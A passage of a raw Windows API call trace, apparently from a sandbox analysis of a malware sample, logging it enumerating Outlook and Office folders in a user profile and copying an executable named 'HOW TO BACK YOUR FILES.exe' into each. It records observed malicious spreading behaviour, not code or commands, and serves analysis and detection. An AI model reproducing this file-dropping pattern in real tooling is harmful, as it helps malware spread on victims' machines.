dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0104.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0104.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache") returned 89 [0104.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache" [0104.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\outlook\\roamcache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.635] GetLastError () returned 0x0 [0104.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.635] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.635] CloseHandle (hObject=0x120) returned 1 [0104.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x609dab00, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6cac0060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cac0060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.636] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.636] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office" [0104.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0240 | out: hHeap=0x2b0000) returned 1 [0104.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.636] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office") returned 78 [0104.636] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office" [0104.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.637] GetLastError () returned 0x0 [0104.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.637] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.637] CloseHandle (hObject=0x120) returned 1 [0104.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4da976c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da976c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.637] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.637] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.637] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig" [0104.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0104.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0104.638] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig") returned 89 [0104.638] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig" [0104.638] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.638] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\onetconfig\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.638] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.639] GetLastError () returned 0x0 [0104.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.639] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.639] CloseHandle (hObject=0x120) returned 1 [0104.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\ONetConfig\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb72310, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6cae61c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cae61c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.639] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.639] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.639] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove" [0104.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0104.639] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove") returned 85 [0104.639] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove" [0104.639] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.639] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\groove\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.640] GetLastError () returned 0x0 [0104.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.640] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.641] CloseHandle (hObject=0x120) returned 1 [0104.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4dae3980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dae3980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User" [0104.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0104.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0104.641] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User") returned 90 [0104.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User" [0104.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\groove\\user\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.642] GetLastError () returned 0x0 [0104.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.642] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.642] CloseHandle (hObject=0x120) returned 1 [0104.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.642] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\User\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4dae3980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dae3980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.642] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.642] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.643] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System" [0104.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0104.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0104.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System") returned 92 [0104.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System" [0104.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\groove\\system\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.644] GetLastError () returned 0x0 [0104.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.644] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.644] CloseHandle (hObject=0x120) returned 1 [0104.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\Groove\\System\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4db09ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4db09ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.644] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0" [0104.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7860 | out: hHeap=0x2b0000) returned 1 [0104.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0") returned 83 [0104.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0" [0104.644] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\14.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.645] GetLastError () returned 0x0 [0104.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.646] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.646] CloseHandle (hObject=0x120) returned 1 [0104.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.646] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x197ec0b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4db09ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4db09ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.646] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache" [0104.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache") returned 99 [0104.646] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache" [0104.646] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.646] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\office\\14.0\\officefilecache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.647] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.647] GetLastError () returned 0x0 [0104.647] RtlAllocateHeap 